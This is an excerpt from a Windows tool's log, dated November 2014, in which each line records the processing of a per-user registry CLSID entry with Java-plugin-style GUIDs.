[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0020-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0021-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0021-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0021-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0022-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0022-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0022-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0023-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0023-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0023-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0024-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0024-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0024-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0026-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0027-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0027-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0027-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0033-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0033-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0033-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0034-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0034-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0034-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0035-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0036-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0036-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0036-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0037-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0038-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0041-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0041-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0041-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0043-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0043-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0043-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0044-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0044-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0044-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0046-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0048-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0049-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0050-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0051-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0054-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0055-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0056-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0057-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0058-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0059-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0060-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0061-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0062-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.311] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBB}]
